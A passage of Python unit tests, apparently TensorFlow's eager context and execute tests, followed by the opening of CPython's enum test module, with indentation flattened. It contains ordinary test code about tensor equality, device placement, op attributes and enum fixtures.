self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
# Warning even though we technically shouldn't be able to compare here,
# since the id is the same both TF & numpy will handle lists with the same
# value without raising an error
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similar to lists we shouldn't be able to do a `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
@test_util.disable_tfrt('Get execution mode not supported in TFRT.')
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testDevice_supportsLogicalDevice(self):
ctx = context.Context()
cpus = ctx.list_logical_devices('CPU')
with ctx.device(cpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
def testDevice_supportsDeviceSpec(self):
ctx = context.Context()
device_name = '/job:localhost/replica:0/task:0/device:CPU:0'
device_spec = pydev.DeviceSpec.from_string(device_name)
with ctx.device(device_spec):
self.assertEqual(device_name, ctx.device_name)
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
@test_util.disable_tfrt('Multi CPU placement not supported yet.')
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = array_ops.identity(1.0)
with ops.device('cpu:0'):
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('GPU:0'):
x = array_ops.identity(1.0)
self.assertEndsWith(x.device, 'GPU:0')
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, current_device())
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
@test_util.disable_tfrt('Context config not supported in TFRT.')
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEqual(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegex(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
cpu.__exit__()
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
@test_util.disable_tfrt('ContextFromInterface not implemented.')
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
with ops.device('CPU:0'):
test_var = variables.Variable([2., 3.])
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
self.assertAllEqual(test_fn(test_var), 1.0)
@test_util.disable_tfrt('PyFunc is not supported in TFRT.')
def testPyFunctionAsync(self):
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
result = test_fn(test_var)
context.async_wait()
self.assertAllEqual(result, 3.0)
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tfe.TFE_Py_RegisterExceptionClass(str)
pywrap_tfe.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
# TODO(b/149995282): When an exception is thrown in ASYNC mode, it seems
# there are things left over that cause mutex corruption when
# _reset_context() is called before the next test is executed.
#
# context.set_execution_mode(context.ASYNC)
# with self.assertRaises(errors.InvalidArgumentError):
# execute(
# b'MatMul',
# num_outputs=1,
# inputs=[three, five],
# attrs=('transpose_a', False, 'transpose_b', False, 'T',
# three.dtype.as_datatype_enum))
# context.context().executor.wait()
#
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
@test_util.run_gpu_only
def testMatMulGPUCopyToCPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
with ops.device('CPU:0'):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3.]]),
constant_op.constant([[5.]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Expecting a Dimension for attr shape, got object'):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [object()], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
@test_util.disable_tfrt('TFRT raises InternalError instead of NotFoundError')
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEqual(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEndsWith(c.device, 'CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEndsWith(c.device, 'GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEndsWith(c.device, 'GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
def testEmptyResourceReturned(self):
with ops.device('CPU:0'):
v = variables.Variable(1.)
empty_handle = array_ops.gather(
v.handle[array_ops.newaxis], array_ops.zeros([0], dtype=dtypes.int32))
self.assertEqual(
[0],
empty_handle.shape.as_list())
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = array_ops.identity(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
test_enum.py
|
import enum
import inspect
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, StrEnum, EnumMeta, Flag, IntFlag, unique, auto
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from test.support import ALWAYS_EQ
from test.support import threading_helper
from datetime import timedelta
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
